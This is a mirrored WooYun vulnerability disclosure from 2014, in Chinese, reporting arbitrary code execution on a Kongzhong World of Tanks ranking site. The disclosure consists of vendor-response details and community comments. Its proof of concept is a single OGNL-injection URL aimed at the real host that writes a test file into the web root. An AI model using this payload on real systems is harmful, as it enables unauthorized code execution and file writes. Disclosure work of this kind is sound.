坦克世界某系统任意代码执行(未深入测试)

2015年8月2日15:18:35评论294 views字数 213阅读0分42秒阅读模式

摘要

2014-11-07：细节已通知厂商并且等待厂商处理中
2014-11-07：厂商已经确认，细节仅向厂商公开
2014-11-17：细节向核心白帽子及相关领域专家公开
2014-11-27：细节向普通白帽子公开
2014-12-07：细节向实习白帽子公开
2014-12-22：细节向公众公开

漏洞概要关注数(10) 关注此漏洞

漏洞标题：坦克世界某系统任意代码执行(未深入测试)

漏洞作者： jusker

提交时间： 2014-11-07 11:17

公开时间： 2014-12-22 11:18

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

2人收藏

漏洞详情

披露状态：

简要描述：

网络安全是一个整体，网络安全要正确对待，如果有一天，你正在玩坦克世界，忽然别人登录。。。，给不给20rank,完全看你们心情，我猜不过5rank

详细说明：

http://rank.kongzhong.com:80/updateUserName?aid=&redirect:xxxxx%25{%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23path%3d%23req.getRealPath(%22/%22)%2b'/x.html',%23d%3dnew%20java.io.FileWriter(%23path),%23d.write('test,from,wooyun'),%23d.close()}

漏洞证明：

修复方案：

版权声明：转载请注明来源 jusker@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-11-07 11:51

厂商回复：

感谢您的支持，我们正在紧急处理。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-07 11:19 | Asuri ( 路人 | Rank:13 漏洞数:6 | Never take off the mask)

0

哎呦，全程金币弹啊

1# 回复此人
2014-11-07 11:45 | Yang ( 普通白帽子 | Rank:354 漏洞数:117 | 作为菜鸟，大米手机摔破了怎么办？)

0

哎呀……玩游戏也能玩出漏洞呀

2# 回复此人
2014-11-07 11:55 | 子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

0

任意执行就6RANK啊....

3# 回复此人
2014-11-12 05:02 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

1

就给你6rank 你能如何？

4# 回复此人
2014-11-27 12:20 | BMa ( 核心白帽子 | Rank:2078 漏洞数:229 )

2

我很好奇怎么发现的？

5# 回复此人
2014-11-27 12:54 | BMa ( 核心白帽子 | Rank:2078 漏洞数:229 )

1

你不深入点，怎能给你rank呢？

6# 回复此人

漏洞概要 关注数(10) 关注此漏洞

缺陷编号： WooYun-2014-82338

漏洞标题： 坦克世界某系统任意代码执行(未深入测试)

相关厂商： 空中网

漏洞作者： jusker

提交时间： 2014-11-07 11:17

公开时间： 2014-12-22 11:18

漏洞类型： 文件上传导致任意代码执行

危害等级： 高